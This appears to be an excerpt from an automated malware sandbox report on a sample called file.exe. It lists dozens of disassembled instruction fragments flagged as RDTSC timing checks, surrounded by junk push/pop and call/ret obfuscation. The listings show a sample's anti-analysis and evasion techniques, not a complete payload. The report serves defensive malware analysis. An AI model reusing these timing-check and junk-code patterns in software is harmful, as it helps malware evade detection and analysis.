                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11341C2 second address: 11341E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F6F31ADDF79h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11344AB second address: 11344B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134937 second address: 1134954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jo 00007F6F31ADDF66h 0x0000000c pop ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F6F31ADDF6Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1136D6C second address: 1136D72 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1136D72 second address: 1136D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1136E4B second address: 1136E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137353 second address: 1137357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137357 second address: 113735D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137416 second address: 1137434 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6F31ADDF76h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11378E8 second address: 11378EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11378EF second address: 11378F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11378F5 second address: 113791E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6F31405BE2h 0x0000000e nop 0x0000000f xor dword ptr [ebp+122D2C61h], eax 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113791E second address: 1137924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137924 second address: 1137928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137928 second address: 1137950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F6F31ADDF6Ch 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137950 second address: 113795A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F6F31405BD6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113795A second address: 113795E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137E58 second address: 1137ED5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6F31405BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F6F31405BD8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+122D2ADAh] 0x0000002c mov si, di 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007F6F31405BD8h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b mov dword ptr [ebp+122D2AC6h], edi 0x00000051 push 00000000h 0x00000053 je 00007F6F31405BE0h 0x00000059 jbe 00007F6F31405BDAh 0x0000005f mov di, CE86h 0x00000063 xchg eax, ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F6F31405BDEh 0x0000006b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137ED5 second address: 1137EEC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F6F31ADDF6Ch 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A316 second address: 113A320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A320 second address: 113A326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A326 second address: 113A3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 sbb edi, 7B782A00h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F6F31405BD8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 jmp 00007F6F31405BE5h 0x0000002e mov dword ptr [ebp+122D20D4h], ecx 0x00000034 sub esi, dword ptr [ebp+122D3517h] 0x0000003a push 00000000h 0x0000003c mov edi, 14832DFEh 0x00000041 pushad 0x00000042 jmp 00007F6F31405BDFh 0x00000047 push ebx 0x00000048 pop ebx 0x00000049 popad 0x0000004a xchg eax, ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jmp 00007F6F31405BDFh 0x00000053 push ecx 0x00000054 pop ecx 0x00000055 popad 0x00000056 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A3A5 second address: 113A3AF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6F31ADDF6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A3AF second address: 113A3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jg 00007F6F31405BD6h 0x00000010 pop esi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113AD5B second address: 113AD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1140D69 second address: 1140D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1140D70 second address: 1140D75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113D796 second address: 113D79C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1140D75 second address: 1140DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6F31ADDF6Eh 0x0000000f nop 0x00000010 push ecx 0x00000011 pop edi 0x00000012 or ebx, 72E92690h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F6F31ADDF68h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov ebx, 2F32FCF7h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007F6F31ADDF68h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 00000016h 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 xchg eax, esi 0x00000056 push edi 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113D79C second address: 113D7A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141EA6 second address: 1141EB0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6F31ADDF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141EB0 second address: 1141EC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 je 00007F6F31405BD6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141EC5 second address: 1141ECB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141ECB second address: 1141F19 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6F31405BDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d mov ebx, esi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F6F31405BD8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push esi 0x0000002c mov bx, 3E2Fh 0x00000030 pop edi 0x00000031 jng 00007F6F31405BD9h 0x00000037 sbb bl, 00000027h 0x0000003a xchg eax, esi 0x0000003b push esi 0x0000003c jc 00007F6F31405BDCh 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1142E47 second address: 1142E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F6F31ADDF70h 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F6F31ADDF66h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1142E68 second address: 1142E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144D69 second address: 1144D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145DB1 second address: 1145E05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+122D1EB4h], ebx 0x00000010 mov dword ptr [ebp+12449DE2h], ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F6F31405BD8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 push 00000000h 0x00000034 stc 0x00000035 movsx ebx, cx 0x00000038 xchg eax, esi 0x00000039 jmp 00007F6F31405BE4h 0x0000003e push eax 0x0000003f push ecx 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144EC0 second address: 1144ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31ADDF6Ah 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1146C96 second address: 1146CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F6F31405BD6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147CBA second address: 1147CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149C96 second address: 1149C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149E02 second address: 1149E08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114AD4D second address: 114AD51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149E08 second address: 1149E36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F6F31ADDF74h 0x00000010 jmp 00007F6F31ADDF6Bh 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CC2E second address: 114CC32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114AD51 second address: 114AD6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149E36 second address: 1149E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114BF44 second address: 114BF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CDF6 second address: 114CE09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149E3C second address: 1149EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D1D13h], esi 0x0000000d mov bl, ah 0x0000000f push dword ptr fs:[00000000h] 0x00000016 sub dword ptr [ebp+1244BAD1h], ecx 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 add dword ptr [ebp+122D1E67h], eax 0x00000029 mov edi, dword ptr [ebp+122D1AFDh] 0x0000002f mov eax, dword ptr [ebp+122D0871h] 0x00000035 clc 0x00000036 push FFFFFFFFh 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007F6F31ADDF68h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 xor dword ptr [ebp+122D1A22h], edi 0x00000058 mov di, dx 0x0000005b nop 0x0000005c jl 00007F6F31ADDF6Ah 0x00000062 push eax 0x00000063 pushad 0x00000064 popad 0x00000065 pop eax 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 push edi 0x0000006a pushad 0x0000006b popad 0x0000006c pop edi 0x0000006d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DEFE second address: 114DFC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b ja 00007F6F31405BDCh 0x00000011 pop eax 0x00000012 nop 0x00000013 add di, F9D5h 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007F6F31405BD8h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 0000001Ch 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 push ecx 0x0000003a add bl, 00000074h 0x0000003d pop edi 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 push 00000000h 0x00000047 push edx 0x00000048 call 00007F6F31405BD8h 0x0000004d pop edx 0x0000004e mov dword ptr [esp+04h], edx 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc edx 0x0000005b push edx 0x0000005c ret 0x0000005d pop edx 0x0000005e ret 0x0000005f jmp 00007F6F31405BE7h 0x00000064 mov bx, dx 0x00000067 mov eax, dword ptr [ebp+122D0D5Dh] 0x0000006d jmp 00007F6F31405BE1h 0x00000072 push FFFFFFFFh 0x00000074 mov ebx, 0C923444h 0x00000079 push eax 0x0000007a push esi 0x0000007b pushad 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114AE1A second address: 114AE20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114EF65 second address: 114EF6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F6F31405BD6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149EAC second address: 1149EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31ADDF72h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CED9 second address: 114CEE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6F31405BD6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FFEB second address: 114FFF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1152EC1 second address: 1152EC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FFF1 second address: 114FFF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11592F6 second address: 11592FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1158AAA second address: 1158AB0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1158BE3 second address: 1158BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EBD2 second address: 115EC1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push ebx 0x0000000d jnl 00007F6F31ADDF66h 0x00000013 pop ebx 0x00000014 pop ecx 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jno 00007F6F31ADDF70h 0x0000001f mov eax, dword ptr [eax] 0x00000021 jl 00007F6F31ADDF70h 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b pushad 0x0000002c pushad 0x0000002d push edi 0x0000002e pop edi 0x0000002f push edi 0x00000030 pop edi 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EC1C second address: 115EC20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EC20 second address: 115EC24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EDB2 second address: 115EDE8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6F31405BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 pop eax 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F6F31405BE8h 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EDE8 second address: 115EE00 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jbe 00007F6F31ADDF72h 0x00000010 jp 00007F6F31ADDF6Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11632D7 second address: 11632F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11632F4 second address: 11632FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6F31ADDF66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11632FE second address: 1163302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163302 second address: 116330A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116330A second address: 116330F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116330F second address: 116331A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116331A second address: 116331E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116331E second address: 1163322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11638A1 second address: 11638A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11638A5 second address: 11638BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11638BD second address: 11638C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6F31405BD6h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11638C8 second address: 11638CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
